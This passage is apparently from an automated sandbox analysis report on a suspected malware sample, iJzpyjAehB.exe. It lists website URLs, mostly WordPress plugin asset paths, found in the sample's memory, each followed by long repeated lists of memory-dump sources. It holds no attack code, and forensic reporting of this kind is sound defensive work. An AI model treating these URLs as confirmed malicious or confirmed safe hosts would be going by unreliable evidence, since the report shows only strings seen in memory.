00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/xmlrpc.php?rsd
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.naoi-a.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007578000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.603177646.0000000007565000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.511351222.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nelipak.nl/
                      Source: iJzpyjAehB.exe, 00000000.00000003.511351222.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nelipak.nl/V
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netcr.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.347142690.00000000075CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nqks.com/
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.0000000007565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ora-ito.com/
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ora.ecnet.jp/
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.0000000007540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.otena.com/
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.0000000007540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.otena.com//z
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.0000000007540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.otena.com/f
                      Source: iJzpyjAehB.exe, 00000000.00000003.347142690.00000000075CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ottospm.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.owsports.ca/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pb-games.com/slots-games.html
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/2
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.css?ver=2.
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-table.css?ver=2
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/cookie-law-info/public/js/cookie-law-info-public.js?ver=2.
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/download-now-for-woocommerce/assets/css/somdn-style.css?ve
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/download-now-for-woocommerce/assets/js/somdn_script.js?ver
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/dt-the7-core/assets/css/post-type.min.css?ver=2.5.7.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.3.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.3.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 